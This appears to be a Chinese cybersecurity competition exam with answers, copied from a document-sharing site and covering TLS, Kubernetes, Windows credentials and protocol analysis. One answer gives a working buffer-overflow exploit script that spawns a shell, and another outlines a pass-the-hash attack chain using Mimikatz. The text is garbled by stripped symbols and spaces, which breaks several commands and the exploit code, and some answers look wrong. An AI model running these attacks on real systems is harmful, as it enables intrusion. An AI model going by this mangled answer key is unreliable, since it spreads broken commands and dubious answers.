版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2025年网络安全比赛试题及答案一、单项选择题(每题1分,共20分。每题只有一个正确答案,请将正确选项字母填在括号内)1.在TLS1.3握手过程中,用于实现前向安全性的密钥交换机制是()A.RSA密钥传输B.静态DHC.ECDHED.PSK答案:C2.某Web应用使用JWT作为会话令牌,签名算法为HS256。若攻击者获取了服务器的密钥,则其可实施的攻击是()A.重放攻击B.签名伪造C.跨站脚本D.会话固定答案:B3.在Linux内核中,可针对特定进程设置“禁用execve系统调用”的安全机制是()A.seccompbpfB.AppArmorC.SELinuxtypetransitionD.capabilities答案:A4.以下关于SM4分组密码算法描述正确的是()A.分组长度128位,密钥长度128位,轮数32轮B.分组长度128位,密钥长度256位,轮数16轮C.分组长度64位,密钥长度128位,轮数32轮D.分组长度256位,密钥长度256位,轮数16轮答案:A5.针对DNSSEC的“签名链”验证失败,最可能导致的后果是()A.域名无法解析B.解析结果不可信C.递归服务器缓存污染D.权威服务器拒绝服务答案:B6.在Windows系统中,能够阻止非管理员用户读取受保护进程内存的防御技术是()A.CFGB.ACGC.ProtectedProcessLight(PPL)D.SEHOP答案:C7.某安卓App在Android13设备上声明android:exported="true"的组件未设置任何权限,则该组件()A.只能被同一签名应用启动B.可被任意第三方应用启动C.只能被系统应用启动D.会被系统拒绝安装答案:B8.以下关于BGP安全扩展(BGPsec)的描述,错误的是()A.使用RPKI验证AS持有前缀的合法性B.对BGPUPDATE消息进行数字签名C.依赖路径上所有AS均支持BGPsecD.可防止路由泄漏答案:D9.在密码学中,以下哪种模式同时提供保密性和完整性,且被TLS1.3采用()A.CBCB.GCMC.CTRD.ECB答案:B10.某企业采用零信任架构,其“动态信任评估引擎”最核心的输入数据是()A.用户静态角色B.实时上下文风险信号C.网络防火墙日志D.年度漏洞扫描报告答案:B11.针对IntelCPU的“Foreshadow”漏洞,利用的硬件特性是()A.SGXB.TSXC.VMXD.SMEP答案:A12.在Kubernetes中,可限制容器进程以非root身份运行的字段是()A.runAsNonRootB.allowPrivilegeEscalationC.readOnlyRootFilesystemD.capabilities.drop答案:A13.某APT组织使用“离地生存”技术,以下哪项属于典型手段()A.上传自定义木马B.利用LivingofftheLand二进制文件C.注册域名生成算法D.使用商业远控答案:B14.在OWASPTop102021中,排名首次进入前三的风险是()A.注入B.失效的访问控制C.加密失败D.不安全设计答案:D15.某IDS规则“alerttcpanyany>any3389(msg:"RDPbruteforce";threshold:typethreshold,trackby_src,count5,seconds10;)”表示()A.10秒内同一源IP对3389端口的连接超过5次即告警B.10秒内不同源IP对3389端口连接超过5次即告警C.每5秒只允许10次连接D.每10秒只允许5次连接答案:A16.在密码学安全证明中,INDCCA安全模型比INDCPA多出对以下哪种能力的抵抗()A.选择明文攻击B.选择密文攻击C.已知明文攻击D.唯密文攻击答案:B17.某云函数(Lambda)使用临时AK/SK访问对象存储,最佳实践是将凭证存储在()A.环境变量B.代码硬编码C.IAM角色D.配置文件答案:C18.针对二维码钓鱼的“域名前置”技术,主要利用的协议是()A.HTTP/2B.DNSoverHTTPSC.CDNSNID.BGP答案:C19.在5G核心网中,用于实现用户面完整性保护的算法是()A.128NEA1B.128NEA2C.128NIA3D.128NEA0答案:C20.某芯片采用“物理不可克隆函数”(PUF)生成密钥,其安全性主要依赖()A.数学难题B.制造过程随机变异C.软件混淆D.侧信道噪声答案:B二、多项选择题(每题2分,共20分。每题有两个或两个以上正确答案,多选、少选、错选均不得分)21.以下哪些属于针对NTP服务的反射放大攻击特征()A.利用monlist命令B.源端口123C.响应包远大于请求包D.使用TCP协议答案:A、B、C22.关于国密SM2椭圆曲线公钥加密算法,下列描述正确的是()A.基于素域256位曲线B.数字签名需使用SM3杂凑C.加密结果包含随机分量D.私钥长度为384位答案:A、B、C23.以下哪些技术可有效缓解SQL注入()A.参数化查询B.ORM框架C.WAF关键字过滤D.存储过程答案:A、B、C、D24.在Windows事件日志中,可辅助发现“哈希传递”攻击的EventID包括()A.4624B.4625C.4648D.4672答案:A、B、C、D25.关于Ransomware防御,以下属于“事前”阶段措施的有()A.321备份策略B.网络微分段C.解密工具收集D.邮件沙箱答案:A、B、D26.以下哪些属于侧信道攻击()A.功耗分析B.电磁泄漏C.缓存时序D.故障注入答案:A、B、C、D27.在IPv6网络中,可用来发现本地链路上活跃节点的机制有()A.NS/NAB.RS/RAC.MLDD.DHCPv6答案:A、B28.关于区块链51%攻击,下列说法正确的是()A.可双花交易B.可阻止交易确认C.可修改历史区块数据D.可逆转任意长度链答案:A、B29.以下哪些属于云原生安全责任共担模型中“云服务方”的责任()A.物理基础设施B.虚拟化层C.客户数据D.身份管理答案:A、B30.在Android13中,以下哪些权限属于“受限权限”需特殊申请()A.READ_MEDIA_IMAGESB.POST_NOTIFICATIONSC.ACCESS_BACKGROUND_LOCATIOND.BODY_SENSORS_BACKGROUND答案:B、C、D三、填空题(每空2分,共20分)31.在Linux内核中,针对“脏牛”漏洞(CVE20165195)的补丁主要对__________子系统加入了“CopyonWrite”竞态条件检查。答案:内存管理(mm)32.TLS1.3中,用于实现0RTT重放保护的“防重放窗口”机制依赖于__________扩展字段。答案:EarlyData(max_early_data_size)33.国密SM3杂凑算法的输出长度为__________位。答案:25634.在KubernetesRBAC中,若某Role绑定了“pods/escalate”子资源,则该角色可对Pod执行__________操作。答案:提升权限(绕过准入)35.WindowsDefenderCredentialGuard利用__________技术将LSASS隔离在VBS安全区域。答案:虚拟化安全(VBS)与LsaIso36.针对WiFi6的WPA3SAE握手,若攻击者离线暴力破解,需先获取__________帧。答案:Commit37.在Python中,使用secrets.token_hex(16)生成的随机字符串长度为__________字符。答案:3238.某IDS规则使用pcre:“/\x90{100,}/”,其目的是检测__________攻击。答案:NOPsled(堆栈溢出)39.在5GAKA流程中,归属网络向终端下发的鉴权令牌称为__________。答案:RAND+AUTN40.芯片级“熔断”漏洞(Meltdown)利用的CPU微架构优化是__________。答案:乱序执行与缓存侧信道四、简答题(每题10分,共30分)41.简述零信任架构中“持续信任评估”引擎的核心数据源与处理流程,并给出一条可落地的风险评分公式。答案:核心数据源:1.身份信号:用户多因素结果、设备证书状态、登录异常;2.网络信号:源IP信誉、地理位置偏移、横向移动图;3.终端信号:EDR告警、系统补丁、运行进程哈希;4.应用信号:API异常调用、敏感数据下载量;5.外部威胁情报:恶意域名、APT指标。处理流程:采集→标准化→加权→衰减→输出风险分。落地公式示例:RiskScore=w1×I+w2×N+w3×E+w4×A+w5×T其中I、N、E、A、T分别表示身份、网络、终端、应用、情报的归一化异常度(01),权重Σw=1。当RiskScore>0.7触发强制二次认证;>0.9直接阻断会话。42.某企业采用Kubernetes+istio服务网格,需实现“东西向流量”的mTLS全链路加密。请给出完整实施步骤,并说明如何验证证书链。答案:步骤:1.安装istio,启用strictmTLS模式:istioctlinstallsetvalues.global.mtls.enabled=truesetmeshConfig.defaultConfig.mode=STRICT2.为所有命名空间打上标签启用自动注入:kubectllabelnsprodistioinjection=enabled3.部署Workload,确保Sidecar注入成功;4.创建PeerAuthentication资源,命名空间级别强制mTLS:apiVersion:security.istio.io/v1beta1kind:PeerAuthenticationmetadata:name:defaultnamespace:prodspec:mtls:mode:STRICT5.创建DestinationRule,定义客户端TLS模式:trafficPolicy.tls.mode:ISTIO_MUTUAL6.验证:a.进入sleepPod,执行curlvhttp://service:port,观察返回“certificaterequired”;b.使用openssls_clientconnectservice:portshowcerts,查看Istio自签根证书;c.通过istioctlauthntlscheckd.svc.cluster.local,确认链上证书有效期、SAN、签发者。43.描述一次完整的“哈希传递”攻击链,并给出Windows与Linux环境下各自的检测与遏制方案。答案:攻击链:1.初始入口:钓鱼邮件→获取低权用户;2.本地提权:利用未打补丁漏洞→SYSTEM;3.凭证收割:Mimikatz导出内存NTLM哈希;4.横向移动:使用crackmapexec/psexec传递哈希登录域控;5.目标达成:Dump域哈希→黄金票据→持久化。Windows检测:1.开启高级审核,监控EventID4624(LogonType3,AuthenticationPackage:NTLM);2.关注4625+4648,同一源IP多账户失败;3.使用SysmonRule:EventID10,CallTrace含“mimikatz”关键字;4.部署CredentialGuard,隔离LSASS;5.组策略限制NTLM(RestrictNTLM:Denyfordomain)。Linux检测:1.审计日志:/var/log/audit/audit.log,搜索type=USER_AUTHacct=””exe=”/usr/bin/su”res=success;2.监控/var/log/secure中PAM认证异常;3.使用AIDE校验/etc/shadow完整性;4.遏制:a.强制Kerberos认证,禁用NTLM;b.实施/etc/pam.d/passwordauth的pam_tally2锁定;c.网络层:iptables限制445/139入口;d.部署JumpServer,统一审计。五、应用题(共60分)44.密码协议分析(15分)某自制协议描述如下:①A→B:IDA||NA②B→A:NB||SigB(NA||NB)③A→B:EKAB(NB)其中SigB为B的RSA签名,EKAB为预共享对称密钥。(1)指出该协议存在的两个主要缺陷;(2)给出改进方案,要求引入会话密钥前向安全性并抵抗密钥泄露伪装攻击。答案:(1)缺陷:a.无时效性,无随机数长度与格式校验,易重放;b.签名仅覆盖NA||NB,未绑定身份与会话标识,存在身份混淆;c.对称密钥长期不变,无前向安全。(2)改进:①A→B:IDA||NA②B→A:NB||SigB(IDA||NA||NB||g^bmodp)③A→B:g^amodp||MACKAB(g^a)④双方计算K=H(g^ab),后续使用K加密。引入临时DH交换,签名绑定身份与DH公钥,实现前向安全;MAC验证防篡改。45.逆向与漏洞利用(15分)给定x8632程序vuln,关键片段:```cvoidvuln(charsrc){charbuf[64];strcpy(buf,src);}```程序开启NX,未开启PIE与Canary,ASLR关闭。(1)写出利用脚本,获得shell(/bin/sh);(2)若系统开启ASLR,请给出两种仍可稳定利用的思路。答案:(1)```python!/usr/bin/envpython3importstruct,subprocesspad=b'A'76system=0x08048430sh=0x0804a024payload=pad+struct.pack('<I',system)+b'BBBB'+struct.pack('<I',sh)subprocess.run(['./vuln'],input=payload)```(2)思路:a.信息泄露:利用程序中已有的puts/printf泄露出libc基址,计算system、/bin/sh偏移;b.ret2plt:重用程序PLT项,无需libc地址;c.部分覆盖:只覆盖EIP低2字节,跳转到固定区域ROP。46.网络流量分析(15分)给定pcap,过滤条件“tcp.port==443”,发现大量TLSClientHello,SNI字段为“”,但证书SubjectCN为“.”。(1)指出攻击场景;(2)给出检测规则(Suricata/Snort)与遏制方案。答案:(1)域名前置(DomainFronting),利用CDNSNI与HTTPHost不一致隐藏真实C2。(2)Suricata规则:```alerttlsanyany>anyany(msg
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 职业噪声对自主神经功能的影响及机制
- 客服主管年终总结公式(3篇)
- 职业健康管理伦理问题探讨
- 职业健康档案电子化数据挖掘与早期干预策略
- 职业健康促进工作规范化与可持续发展
- 齐齐哈尔2025年黑龙江齐齐哈尔市委网络安全和信息化委员会办公室直属事业单位招聘笔试历年参考题库附带答案详解
- 韶关2025年广东韶关市教育局直属学校招聘临聘教师23人笔试历年参考题库附带答案详解
- 西双版纳云南西双版纳州人力资源和社会保障局公益性岗位招聘笔试历年参考题库附带答案详解
- 舟山2025年下半年浙江舟山市属事业单位招聘28人笔试历年参考题库附带答案详解
- 玉林2025年广西玉林市第二幼儿园招聘安保人员笔试历年参考题库附带答案详解
- 心脏血管检查课件
- 运用PDCA循环管理提高手卫生依从性课件
- 二手房定金合同(2023版)正规范本(通用版)1
- 《高职应用数学》(教案)
- 点因素法岗位评估体系详解
- 汉堡规则中英文
- DB63T 1933-2021无人机航空磁测技术规范
- YY/T 1843-2022医用电气设备网络安全基本要求
- GB/T 5231-2022加工铜及铜合金牌号和化学成分
- GB/T 26480-2011阀门的检验和试验
- GA/T 1356-2018国家标准GB/T 25724-2017符合性测试规范
评论
0/150
提交评论